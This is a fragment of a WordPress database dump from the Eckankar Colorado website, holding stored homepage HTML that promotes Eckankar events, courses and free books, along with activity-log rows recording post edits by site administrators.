data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243212,41217,'post_type','mec-events'),(243211,41217,'post_id','269412'),(243166,41213,'_message_key','post_updated'),(243167,41213,'_user_id','2'),(243168,41213,'_user_login','S8zhaBda'),(243169,41213,'_user_email','nada@zipnadanot.org'),(243170,41213,'_server_remote_addr','76.130.120.x'),(243171,41213,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(243172,41214,'post_id','269412'),(243173,41214,'post_type','mec-events'),(243174,41214,'post_title','ECK LIGHT &#038; SOUND SERVICE &#8211; How Can I Listen to Divine Guidance?'),(243175,41214,'post_new_thumb_id','266160'),(243176,41214,'post_new_thumb_title','bird-sky-1'),(243177,41214,'post_meta_added','79'),(243178,41214,'_message_key','post_updated'),(243179,41214,'_user_id','15'),(243180,41214,'_user_login','john-admin-96'),(243181,41214,'_user_email','nadazipought@zilch.org'),(243182,41214,'_server_remote_addr','184.96.219.x'),(243183,41214,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269412'),(243184,41215,'post_id','269412'),(243185,41215,'post_type','mec-events'),(243186,41215,'post_title','ECK LIGHT &#038; SOUND SERVICE &#8211; How Can I Listen to Divine Guidance?'),(243187,41215,'post_new_thumb_id','266160'),(243188,41215,'post_new_thumb_title','bird-sky-1'),(243189,41215,'post_meta_added','79'),(243190,41215,'_message_key','post_updated'),(243191,41215,'_user_id','15'),(243192,41215,'_user_login','john-admin-96'),(243193,41215,'_user_email','nadazipought@zilch.org'),(243194,41215,'_server_remote_addr','184.96.219.x'),(243195,41215,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269412'),(243196,41216,'post_type','attachment'),(243197,41216,'attachment_id','269414'),(243198,41216,'attachment_title','Butterfly2'),(243199,41216,'attachment_filename','Butterfly2.webp'),(243200,41216,'attachment_mime','image/webp'),(243201,41216,'attachment_filesize','38506'),(243202,41216,'attachment_parent_id','269412'),(243203,41216,'attachment_parent_title','ECK LIGHT &#038; SOUND SERVICE &#8211; How Can I Listen to Divine Guidance?'),(243204,41216,'attachment_parent_post_type','mec-events'),(243205,41216,'_message_key','attachment_created'),(243206,41216,'_user_id','15'),(243207,41216,'_user_login','john-admin-96'),(243208,41216,'_user_email','nadazipought@zilch.org'),(243209,41216,'_server_remote_addr','184.96.219.x'),(243210,41216,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269412'),(241907,41088,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual 